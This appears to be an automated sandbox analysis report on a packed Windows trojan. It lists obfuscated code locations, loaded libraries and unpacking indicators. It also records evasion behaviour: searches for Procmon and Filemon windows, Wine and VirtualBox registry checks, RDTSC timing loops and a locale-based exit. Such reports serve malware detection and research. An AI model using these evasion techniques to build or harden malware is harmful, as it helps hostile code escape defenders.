Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F545A8	0_2_00F545A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7D5A8	0_2_00F7D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012C7441	0_2_012C7441
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F34573	0_2_00F34573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3E544	0_2_00F3E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136E48C	0_2_0136E48C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F996FD	0_2_00F996FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F566C8	0_2_00F566C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8A648	0_2_00F8A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F86799	0_2_00F86799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6D720	0_2_00F6D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136C92F	0_2_0136C92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7F8D6	0_2_00F7F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F698B8	0_2_00F698B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6B8A8	0_2_00F6B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64868	0_2_00F64868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0128F9CE	0_2_0128F9CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136781D	0_2_0136781D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136280D	0_2_0136280D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F84BA8	0_2_00F84BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F80B88	0_2_00F80B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01365D47	0_2_01365D47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8AC28	0_2_00F8AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F64DC8	0_2_00F64DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F65DB9	0_2_00F65DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F41D78	0_2_00F41D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6BD68	0_2_00F6BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7AD38	0_2_00F7AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F81EE8	0_2_00F81EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F58E78	0_2_00F58E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0136FFCF	0_2_0136FFCF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0128DE5E	0_2_0128DE5E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012D1EF2	0_2_012D1EF2

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00F14610 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: yhvanrkb ZLIB complexity 0.994987962613293

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00F29790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00F23970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7W9T3KML.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2133504 > 1048576

Source: file.exe

Static PE information: Raw size of yhvanrkb is bigger than: 0x100000 < 0x19dc00

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.f10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhvanrkb:EW;owhwljin:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00F29BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x2149bd should be: 0x20bfe1

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: yhvanrkb
Source: file.exe	Static PE information: section name: owhwljin
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0138D064 push edx; mov dword ptr [esp], ebx	0_2_0138D44A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3A0DC push eax; retf	0_2_00F3A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013D3176 push eax; mov dword ptr [esp], edi	0_2_013D31E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01420111 push ebp; mov dword ptr [esp], ecx	0_2_01420152
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01420111 push 12BE9830h; mov dword ptr [esp], ebp	0_2_01420195
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01420111 push 6A4B206Ch; mov dword ptr [esp], ebx	0_2_014201DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 527194D0h; mov dword ptr [esp], ebp	0_2_0137216E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 50296553h; mov dword ptr [esp], esp	0_2_01372213
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 0D3E45BCh; mov dword ptr [esp], eax	0_2_0137222F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 7B6F8124h; mov dword ptr [esp], esi	0_2_013722F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 56F78DF1h; mov dword ptr [esp], edx	0_2_01372374
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], esp	0_2_01372382
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 2E869085h; mov dword ptr [esp], eax	0_2_013723B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx	0_2_0137241C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 1B37D633h; mov dword ptr [esp], edx	0_2_01372463
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], ebx	0_2_0137248C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 2B004513h; mov dword ptr [esp], edi	0_2_013725E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 5E859901h; mov dword ptr [esp], ebp	0_2_0137260D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push edx; mov dword ptr [esp], 6DCAD2DEh	0_2_01372611
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 20941F2Dh; mov dword ptr [esp], ebp	0_2_0137262C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 389D0686h; mov dword ptr [esp], ebx	0_2_0137267F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 2EC98222h; mov dword ptr [esp], esi	0_2_01372691
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 40AABE50h; mov dword ptr [esp], ecx	0_2_01372710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], ebx	0_2_0137276E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push edx; mov dword ptr [esp], 37BE06D6h	0_2_0137279B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push edi; mov dword ptr [esp], edx	0_2_0137280B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 42DBE0D3h; mov dword ptr [esp], esp	0_2_01372867
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push eax; mov dword ptr [esp], edx	0_2_01372902
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push ecx; mov dword ptr [esp], ebx	0_2_01372921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 665D2052h; mov dword ptr [esp], esp	0_2_01372969
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E push 5F819381h; mov dword ptr [esp], esi	0_2_01372978

Source: file.exe

Static PE information: section name: yhvanrkb entropy: 7.953026815598935

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00F29BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FE2F7 second address: 11FDB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a sbb edx, 1121E984h 0x00000010 mov dword ptr [ebp+122D2A87h], ebx 0x00000016 popad 0x00000017 push dword ptr [ebp+122D01A5h] 0x0000001d pushad 0x0000001e mov edi, 24A4AE9Eh 0x00000023 mov cx, di 0x00000026 popad 0x00000027 call dword ptr [ebp+122D22DDh] 0x0000002d pushad 0x0000002e jmp 00007F0F04CBD323h 0x00000033 xor eax, eax 0x00000035 jng 00007F0F04CBD325h 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f js 00007F0F04CBD31Ch 0x00000045 xor dword ptr [ebp+122D2ACAh], edx 0x0000004b mov dword ptr [ebp+122D3820h], eax 0x00000051 jmp 00007F0F04CBD31Dh 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007F0F04CBD327h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 xor dword ptr [ebp+122D1875h], edi 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+122D1875h], esi 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 cld 0x00000077 cmc 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jnl 00007F0F04CBD322h 0x00000082 push eax 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FDB3C second address: 11FDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137CBCF second address: 137CBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BAFF second address: 137BB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB03 second address: 137BB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB1E second address: 137BB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BC8F second address: 137BC95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BC95 second address: 137BC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BC9B second address: 137BCA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BCA7 second address: 137BCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BE12 second address: 137BE39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push esi 0x00000008 jmp 00007F0F04CBD328h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C256 second address: 137C265 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C265 second address: 137C26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C26B second address: 137C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DFA3 second address: 137DFB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DFB1 second address: 137E01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 3E88A8FCh 0x00000012 mov dword ptr [ebp+122D234Dh], edi 0x00000018 push 00000003h 0x0000001a mov ch, al 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F0F0527E408h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jmp 00007F0F0527E415h 0x0000003d push 00000003h 0x0000003f mov si, A873h 0x00000043 push ABB3C9A3h 0x00000048 push edx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E01D second address: 137E048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 6BB3C9A3h 0x0000000d mov dword ptr [ebp+122D21E9h], ebx 0x00000013 lea ebx, dword ptr [ebp+12453E1Ah] 0x00000019 pushad 0x0000001a xor ah, 00000047h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 js 00007F0F04CBD316h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0C0 second address: 137E0DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E416h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0DA second address: 137E0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0DF second address: 137E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0F1 second address: 137E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F04CBD318h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3898h] 0x00000029 xor dx, E5B2h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c push A02F51E2h 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0F04CBD31Ah 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E15D second address: 137E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a add dword ptr [esp], 5FD0AE9Eh 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2AC3h], edx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2E07h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F0F0527E408h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov si, 2B17h 0x00000041 mov di, si 0x00000044 push A07DFA96h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E1B7 second address: 137E1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E29A second address: 137E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E2AE second address: 137E322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov ebx, dword ptr [ebp+122D3780h] 0x00000012 and edi, dword ptr [ebp+122D21E9h] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov edx, dword ptr [ebp+122D38A4h] 0x00000022 pop edi 0x00000023 push 7B65ECA4h 0x00000028 push esi 0x00000029 jnc 00007F0F04CBD318h 0x0000002f pop esi 0x00000030 xor dword ptr [esp], 7B65EC24h 0x00000037 jmp 00007F0F04CBD325h 0x0000003c xor edi, dword ptr [ebp+122D3A58h] 0x00000042 push 00000003h 0x00000044 mov edx, dword ptr [ebp+122D384Ch] 0x0000004a push 00000000h 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D379Ch] 0x00000054 call 00007F0F04CBD319h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E322 second address: 137E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E329 second address: 137E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F04CBD31Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0F04CBD31Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0F04CBD322h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F0F04CBD329h 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 mov dword ptr [ebp+122D2B3Ah], edx 0x00000037 lea ebx, dword ptr [ebp+12453E2Eh] 0x0000003d xor dword ptr [ebp+122D2A5Ch], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F0F04CBD31Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1390661 second address: 1390665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139F198 second address: 139F1F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F04CBD328h 0x0000000e jnp 00007F0F04CBD318h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push edi 0x00000017 jo 00007F0F04CBD316h 0x0000001d pop edi 0x0000001e popad 0x0000001f push ecx 0x00000020 jmp 00007F0F04CBD324h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139D7FE second address: 139D804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139D804 second address: 139D808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DBCF second address: 139DBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DD94 second address: 139DDA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DDA8 second address: 139DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DDAE second address: 139DDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E065 second address: 139E089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E418h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E089 second address: 139E08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1396515 second address: 1396519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13714B4 second address: 13714BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E33F second address: 139E353 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F0527E40Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
